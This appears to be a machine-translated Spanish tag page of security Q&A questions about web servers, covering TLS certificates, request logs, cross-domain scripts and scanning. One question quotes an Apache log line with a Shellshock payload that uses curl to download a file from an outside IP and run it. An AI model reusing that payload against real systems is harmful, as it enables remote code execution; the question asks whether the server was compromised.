Preguntas con etiqueta 'webserver'

preguntas con etiqueta
1
respuesta

Solicitud extraña al servidor web NodeJS

Entonces, al registrar todas las solicitudes, obtengo cosas como estas: Lunes 07 de septiembre de 2015 21:30:04 GMT + 0200 (CEST) Se recibió una solicitud para enlace también para enlace Mi servidor simple: var server = http.creat...
hecha 07.09.2015 - 22:53
2
respuestas

¿Qué algoritmo debo usar para evitar el error "ERR_SSL_WEAK_SERVER_EPHEMERAL_DH_KEY"?

Obtuve un certificado de CA al enviar mi CSR de GoDaddy, después de aplicar un certificado a mi servidor web Tomcat. Cuando accedo a mi sitio web utilizando Chrome o Mozilla, me encuentro con el error:    ERR_SSL_WEAK_SERVER_EPHEMERAL_DH_KEY...
hecha 17.09.2015 - 07:10
1
respuesta

Seguridad de Javascript de dominio cruzado [duplicado]

Utilicé un escáner de vulnerabilidad web para escanear mi sitio web. Indica varios enlaces con "Inclusión de archivo de origen de secuencia de comandos de Java de dominio cruzado" ¿Puedo saber cómo un atacante explotaría este tipo de vulner...
hecha 04.03.2015 - 11:48
2
respuestas

Fijación de claves públicas y subdominios

En breve tengo la intención de instalar un nuevo servidor web y me gustaría asegurar un poco más a los usuarios. Ya tengo dominio, servidor (virtual) y todo lo que importa al configurar un servidor. Básicamente, este será utilizado como servidor...
hecha 01.09.2015 - 22:04
3
respuestas

Más allá de las inyecciones de SQL y XSS

Soy un programador que trabaja en un servicio web (por mi cuenta). Dado que no soy un experto en seguridad, vine a este sitio web para formular mi pregunta. Hice todas las cosas importantes para asegurar mi sitio web. Intenté protegerme contr...
hecha 22.12.2014 - 23:23
1
respuesta

¿Deben considerarse más seguros los binarios del servidor (demonios) enlazados estáticamente? [cerrado]

Durante mucho tiempo he reflexionado sobre esta pregunta. Soy consciente de las ventajas y desventajas de las bibliotecas dinámicas (objetos compartidos), incluyendo artículo infame de Drepper . En igualdad de condiciones, ¿no es un binario...
hecha 30.05.2014 - 20:42
1
respuesta

¿Cómo elige un navegador qué certificado usar si mi servidor web tiene varios certificados?

Estoy usando Apache 2.4, con dos certificados, un RSA firmado por CACert y un ECC autofirmado. Ninguno de estos certificados proporciona una ruta a un certificado raíz de confianza confiable. Mi pregunta es la siguiente: cuando se presentan do...
hecha 18.11.2014 - 15:18
2
respuestas

¿Es ilegal usar agentes de usuario falsos? [cerrado]

¿Es ilegal hacerse pasar por usuarios-agentes cuando está rastreando un sitio web? Si es así, ¿qué y cómo se puede tomar una acción legal contra el solicitante falso? ¿Esta ley se aplica solo a los rastreadores o a un usuario que se hace pas...
hecha 26.09.2013 - 11:32
1
respuesta

Los registros de Apache muestran la ejecución de los comandos

Me pregunto si mi servidor está comprometido o no. Solo miré mi registro y vi la siguiente línea allí: IP: 173.249.4.160, Date: 27-12-17, Time:09:52:51, Browser: () { :;}; /bin/bash -c "curl -o /tmp/zmuie http://162.243.117.130/zmuie;/usr/bi...
hecha 28.12.2017 - 20:24
2
respuestas

La forma más eficiente de escanear servidores web

Digamos que quiero escanear una gran cantidad de direcciones IP para servidores web que se ejecutan en el puerto 80 (consciente de que hay otros puertos para servidores web, ignorando por ejemplo). ¿Cuál sería la forma más eficiente de hacer...
hecha 07.01.2018 - 20:00